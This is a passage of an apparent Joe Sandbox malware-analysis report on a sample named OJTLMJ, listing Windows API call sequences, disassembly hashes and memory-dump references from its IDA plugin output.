                                                                                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                • String ID:
                                                                                                                • API String ID: 1827037458-0
                                                                                                                • Opcode ID: fb000c84db9a98160062bebefcab2d4ccc9e77ff6f88f50a264973e0eb2d77fa
                                                                                                                • Instruction ID: faa9dd049925d9897b848ee56b9957ae109ec0a13de0a21af0e43bb27c420d62
                                                                                                                • Opcode Fuzzy Hash: fb000c84db9a98160062bebefcab2d4ccc9e77ff6f88f50a264973e0eb2d77fa
                                                                                                                • Instruction Fuzzy Hash: 7C41AC70100301AFCB21DF25CC84FAA7BE8EB45331F04066AFDA68A2A1C731D949DB71
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(00E01810,00000000,?,?,00E01810,00E01810,?,00DBE2D6), ref: 00DAE21B
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 00DAE23F
                                                                                                                • ShowWindow.USER32(00E01810,00000000,?,?,00E01810,00E01810,?,00DBE2D6), ref: 00DAE29F
                                                                                                                • ShowWindow.USER32(?,00000004,?,?,00E01810,00E01810,?,00DBE2D6), ref: 00DAE2B1
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00DAE2D5
                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00DAE2F8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 642888154-0
                                                                                                                • Opcode ID: 749eb2ad4acba855e942db8a91a8173ce405c445d733d4d150ecd755e846fb0c
                                                                                                                • Instruction ID: 3e5dcfca213917014dc4bae4828b2177c06fabf6cd70333eda8c87cef167773a
                                                                                                                • Opcode Fuzzy Hash: 749eb2ad4acba855e942db8a91a8173ce405c445d733d4d150ecd755e846fb0c
                                                                                                                • Instruction Fuzzy Hash: 3C415E35641245EFEB26CF14C899F947BE5BB0B314F1C42B9FA588F2A2C731A841CB65
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,00D97D81,?,?,00000000,00000001), ref: 00D99FFA
                                                                                                                  • Part of subcall function 00D96B19: GetWindowRect.USER32(?,?), ref: 00D96B2C
                                                                                                                • GetDesktopWindow.USER32 ref: 00D9A024
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00D9A02B
                                                                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00D9A05D
                                                                                                                  • Part of subcall function 00D88355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D883CD
                                                                                                                • GetCursorPos.USER32(?), ref: 00D9A089
                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00D9A0EB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 4137160315-0
                                                                                                                • Opcode ID: d9426672cda9967401cc540127452ab765c234fa553fa97ed336cca41fc50035
                                                                                                                • Instruction ID: 69935a5965dccaa6616d4a43bee840d8d9c05cacada12c2b388cee926725e551
                                                                                                                • Opcode Fuzzy Hash: d9426672cda9967401cc540127452ab765c234fa553fa97ed336cca41fc50035
                                                                                                                • Instruction Fuzzy Hash: A631B473504306ABDB20DF68DC45F9AB7E9FF88314F04092AF599D7291DA31E944CBA2
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00D7BCD9
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00D7BCE0
                                                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00D7BCEF
                                                                                                                • CloseHandle.KERNEL32(00000004), ref: 00D7BCFA
                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D7BD29
                                                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00D7BD3D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                • String ID:
                                                                                                                • API String ID: 1413079979-0
                                                                                                                • Opcode ID: 0fe85415695e85b64cbf8528be79a8e37829881567d88b20890320a3969688d2
                                                                                                                • Instruction ID: 9a0fc574a1e9173a7fbef6655741beb226d522218b9dfedba4ce3db65c797d61
                                                                                                                • Opcode Fuzzy Hash: 0fe85415695e85b64cbf8528be79a8e37829881567d88b20890320a3969688d2
                                                                                                                • Instruction Fuzzy Hash: 6421507210020AABDF129FA8DD49FEE7BA9EF44314F148066FE05A6160E776CD61DB70
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00D5B5EB
                                                                                                                  • Part of subcall function 00D5B58B: SelectObject.GDI32(?,00000000), ref: 00D5B5FA
                                                                                                                  • Part of subcall function 00D5B58B: BeginPath.GDI32(?), ref: 00D5B611
                                                                                                                  • Part of subcall function 00D5B58B: SelectObject.GDI32(?,00000000), ref: 00D5B63B
                                                                                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00DAE9F2
                                                                                                                • LineTo.GDI32(00000000,00000003,?), ref: 00DAEA06
                                                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00DAEA14
                                                                                                                • LineTo.GDI32(00000000,00000000,?), ref: 00DAEA24
                                                                                                                • EndPath.GDI32(00000000), ref: 00DAEA34
                                                                                                                • StrokePath.GDI32(00000000), ref: 00DAEA44
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 43455801-0
                                                                                                                • Opcode ID: 1e8ce1e5f762570368de079b0e7039560601c716b741ee585860848bc1ffde02
                                                                                                                • Instruction ID: 3eb95692c812ed035a52b968d9d84b98e15deb5399ab386e821499d7d02a1158
                                                                                                                • Opcode Fuzzy Hash: 1e8ce1e5f762570368de079b0e7039560601c716b741ee585860848bc1ffde02
                                                                                                                • Instruction Fuzzy Hash: 4711097600024ABFDF029F94DC88E9A7FADEB08350F048026FE0999160D7719E95DBB0
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 00D7EFB6
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D7EFC7
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D7EFCE
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00D7EFD6
                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00D7EFED
                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 00D7EFFF
                                                                                                                  • Part of subcall function 00D7A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00D7A79D,00000000,00000000,?,00D7AB73), ref: 00D7B2CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 603618608-0
                                                                                                                • Opcode ID: b0df4445029d4decf731b28093d63fd768f5ce5940a3fdee7755a2fca88e3984
                                                                                                                • Instruction ID: 75f9561c32d9c44e7e6ddcb9395c3dea6d83229d8761ed99ff8981a778164e85
                                                                                                                • Opcode Fuzzy Hash: b0df4445029d4decf731b28093d63fd768f5ce5940a3fdee7755a2fca88e3984
                                                                                                                • Instruction Fuzzy Hash: 8C017575A4030ABFEB109BA69C45E5EBFB9EB49351F044066F908E7380D6709C00CB71
                                                                                                                APIs
                                                                                                                • __init_pointers.LIBCMT ref: 00D687D7
                                                                                                                  • Part of subcall function 00D61E5A: __initp_misc_winsig.LIBCMT ref: 00D61E7E
                                                                                                                  • Part of subcall function 00D61E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D68BE1
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D68BF5
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D68C08
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D68C1B
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D68C2E
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00D68C41
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00D68C54
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00D68C67
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00D68C7A
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00D68C8D
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00D68CA0
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00D68CB3
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00D68CC6
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00D68CD9
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00D68CEC
                                                                                                                  • Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00D68CFF
                                                                                                                • __mtinitlocks.LIBCMT ref: 00D687DC
                                                                                                                  • Part of subcall function 00D68AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00DFAC68,00000FA0,?,?,00D687E1,00D66AFA,00DF67D8,00000014), ref: 00D68AD1
                                                                                                                • __mtterm.LIBCMT ref: 00D687E5
                                                                                                                  • Part of subcall function 00D6884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00D687EA,00D66AFA,00DF67D8,00000014), ref: 00D689CF
                                                                                                                  • Part of subcall function 00D6884D: _free.LIBCMT ref: 00D689D6
                                                                                                                  • Part of subcall function 00D6884D: DeleteCriticalSection.KERNEL32(00DFAC68,?,?,00D687EA,00D66AFA,00DF67D8,00000014), ref: 00D689F8
                                                                                                                • __calloc_crt.LIBCMT ref: 00D6880A
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00D68833
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2942034483-0
                                                                                                                • Opcode ID: 71b1364a1fedab159eddbf52f38fa577cf868774280887be0dcf5e010ba2f358
                                                                                                                • Instruction ID: 4296e2019241467cefe004de0ab8065a20bd5de7f46a0bc7d19660011f89111f
                                                                                                                • Opcode Fuzzy Hash: 71b1364a1fedab159eddbf52f38fa577cf868774280887be0dcf5e010ba2f358
                                                                                                                • Instruction Fuzzy Hash: 6CF0BE731197125BE3747B7CBC0BA5A2BC0CF017B0B684B2AF468D60E2FF518841A1B5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 1423608774-0
                                                                                                                • Opcode ID: f1b24ef1e18652667711bf767d9db84b5a24f539c3c3f656c3379d52c3fc5c12
                                                                                                                • Instruction ID: 4dfb415dfe82a92c0264c1e6173b27af7cb634b387c561672f0eaefd3c1887f5
                                                                                                                • Opcode Fuzzy Hash: f1b24ef1e18652667711bf767d9db84b5a24f539c3c3f656c3379d52c3fc5c12
                                                                                                                • Instruction Fuzzy Hash: B6018132141313ABE7153B98ED48DEBB76AFF8A702B04053AF503D26A1DB60A801CB71
                                                                                                                APIs
                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D41898
                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D418A0
                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D418AB
                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D418B6
                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D418BE
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D418C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4278518827-0
                                                                                                                • Opcode ID: 2e64b61eb053c4b03361b08a9b855fa6b276b49d09fe9282228c67239726a0e9
                                                                                                                • Instruction ID: c3300628d4ca685f701f0607f393b551bc380ed903a6cd5bc56096bc67a62921
                                                                                                                • Opcode Fuzzy Hash: 2e64b61eb053c4b03361b08a9b855fa6b276b49d09fe9282228c67239726a0e9
                                                                                                                • Instruction Fuzzy Hash: 7A0144B0942B5ABDE3008F6A8C85A52FEA8FF19354F04411BA15C87A42C7B5A864CBE5
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00D88504
                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00D8851A
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00D88529
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D88538
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D88542
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D88549
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 839392675-0
                                                                                                                • Opcode ID: 94505220aa7a5fab5d7ce8684d5609048b29470ef5b33e26270cf88c30a19512
                                                                                                                • Instruction ID: f8696e6a10015c5ee088fd805a79add5ab262f6332947ee79a0456542f6f52ca
                                                                                                                • Opcode Fuzzy Hash: 94505220aa7a5fab5d7ce8684d5609048b29470ef5b33e26270cf88c30a19512
                                                                                                                • Instruction Fuzzy Hash: 6BF0BE7224035BBBE7215B629C0EEEF7E7DDFC6B11F000068FA01D1150EBA02A01D6B4
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00D8A330
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,00DB66D3,?,?,?,?,?,00D4E681), ref: 00D8A341
                                                                                                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,00DB66D3,?,?,?,?,?,00D4E681), ref: 00D8A34E
                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00DB66D3,?,?,?,?,?,00D4E681), ref: 00D8A35B
                                                                                                                  • Part of subcall function 00D89CCE: CloseHandle.KERNEL32(?,?,00D8A368,?,?,?,00DB66D3,?,?,?,?,?,00D4E681), ref: 00D89CD8
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00D8A36E
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,00DB66D3,?,?,?,?,?,00D4E681), ref: 00D8A375
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 3495660284-0
                                                                                                                • Opcode ID: 32798f671acc6f0c14f3471cf5fbe41cc2e9d62377ce61c3a10416cfa04f65f8
                                                                                                                • Instruction ID: 3abe6b176eb9857b3c049d30016cacb4c8cc4f64bc61804c7088aadd05d8c22e
                                                                                                                • Opcode Fuzzy Hash: 32798f671acc6f0c14f3471cf5fbe41cc2e9d62377ce61c3a10416cfa04f65f8
                                                                                                                • Instruction Fuzzy Hash: 3BF05E72141313ABE3112BA8ED48DEBBB7AEF89302B040532F202D12A1DBB59801CB71
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D6010A: std::exception::exception.LIBCMT ref: 00D6013E
                                                                                                                  • Part of subcall function 00D6010A: __CxxThrowException@8.LIBCMT ref: 00D60153
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                  • Part of subcall function 00D4BBD9: _memmove.LIBCMT ref: 00D4BC33
                                                                                                                • __swprintf.LIBCMT ref: 00D5D98F
                                                                                                                Strings
                                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00D5D832
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                • API String ID: 1943609520-557222456
                                                                                                                • Opcode ID: 933d303a9c47381b1798c07a9617edfa6badb39e7d8256ce53fa626a68c207e3
                                                                                                                • Instruction ID: 52fcc298090c2d6ec9f97377f09a2c4934ea676277ae3cf9b9a176e60724806e
                                                                                                                • Opcode Fuzzy Hash: 933d303a9c47381b1798c07a9617edfa6badb39e7d8256ce53fa626a68c207e3
                                                                                                                • Instruction Fuzzy Hash: E5915B31118241DFCB24EF24C885DAEBBA6EF95710F04491DF896972A1EB20ED48CB76
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00D9B4A8
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00D9B5B7
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00D9B73A
                                                                                                                  • Part of subcall function 00D8A6F6: VariantInit.OLEAUT32(00000000), ref: 00D8A736
                                                                                                                  • Part of subcall function 00D8A6F6: VariantCopy.OLEAUT32(?,?), ref: 00D8A73F
                                                                                                                  • Part of subcall function 00D8A6F6: VariantClear.OLEAUT32(?), ref: 00D8A74B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                • API String ID: 4237274167-1221869570
                                                                                                                • Opcode ID: 168e8b5f70237a4ba0b9f12015998a8b3bfbe8c9b936b257cb829e3c187f166f
                                                                                                                • Instruction ID: 555bc47aff7ebb4b76974f7eeb9a42b8139b277eeec0ca668884ab291997a6e0
                                                                                                                • Opcode Fuzzy Hash: 168e8b5f70237a4ba0b9f12015998a8b3bfbe8c9b936b257cb829e3c187f166f
